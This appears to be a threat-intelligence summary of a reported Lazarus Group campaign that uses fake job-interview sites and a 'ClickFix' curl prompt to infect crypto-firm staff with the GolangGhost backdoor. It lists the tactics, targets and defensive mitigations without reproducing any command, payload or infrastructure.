Full Report
The notorious North Korean Lazarus hacking group has reportedly adopted 'ClickFix' tactics to deploy malware targeting job seekers in the cryptocurrency industry, particularly centralized finance (CeFi). [...]
Analysis Summary
# Threat Actor: Lazarus Group
## Attribution & Identity
Attributed to North Korean hackers. The article specifically details their adoption of the "ClickFix" attack concept, an evolution potentially related to prior "ClickFake" lure campaigns observed by Sekoia.
## Activity Summary
The actor has shifted focus in their "ClickFake" or similar social engineering campaigns from targeting developers/coders to targeting non-technical personnel in Centralized Finance (CeFi) cryptocurrency firms, specifically mentioning business developers and marketing managers. The attack involves luring victims to a legitimate-appearing remote interview site (built in ReactJS) which requests a video introduction. Upon attempting to record, a fake error prompts the victim to run a `curl` command in either Windows CMD or macOS Terminal, leading to malware infection.
## Tactics, Techniques & Procedures
- **Initial Access/Execution:** Social engineering via fake remote interview invitations leading to execution of commands.
- **Execution:** Running `curl` commands provided via malicious instructions on the landing page.
- **Persistence:** Establishing persistence via registry modification (Windows) and LaunchAgent plist files (macOS).
- **Defense Evasion/Discovery:** The C2 connection registers a unique machine ID.
- **Collection:** Stealing Chrome cookies, browsing history, and stored passwords.
- **Command and Control:** Establishing C2 communication after infection.
- **Credential Access:** Specifically targeting stored passwords in Chrome.
## Targeting
- **Sectors:** Cryptocurrency firms (CeFi companies).
- **Geography:** Not specified, but the instructions are OS-specific (Windows and macOS).
- **Victims:** Non-technical roles within crypto firms, such as business developers and marketing managers.
## Tools & Infrastructure
- **Malware families used:**
- **GolangGhost:** A Go-based backdoor used as the primary implant.
- **Infrastructure (C2, domains, IPs - defang URLs):** Command and control (C2) servers are utilized for communication and receiving commands. (No specific defanged infrastructure details were provided in the excerpt).
## Implications
Lazarus Group is actively diversifying its infiltration methods to bypass traditional developer-focused defenses by targeting less technically savvy employees within high-value crypto firms. This suggests a continued, aggressive effort to achieve financial gain through cryptocurrency theft. The adoption of platform-native execution methods (`curl` in Terminal/CMD) blended with convincing social engineering poses a high risk.
## Mitigations
- **Never execute commands copied from the internet** in Windows Command Prompt or macOS Terminal, especially if the command's function is not fully understood.
- **Verify job/interview solicitations:** Exercise extreme caution with unsolicited interview invitations, especially those that require accessing external links or running local commands.
- **Utilize Threat Intelligence:** Deploying provided Yara rules to detect and block ClickFake/GolangGhost activity.
- **System Hardening:** Ensure robust patching and monitoring for suspicious registry modifications and new LaunchAgent plist files.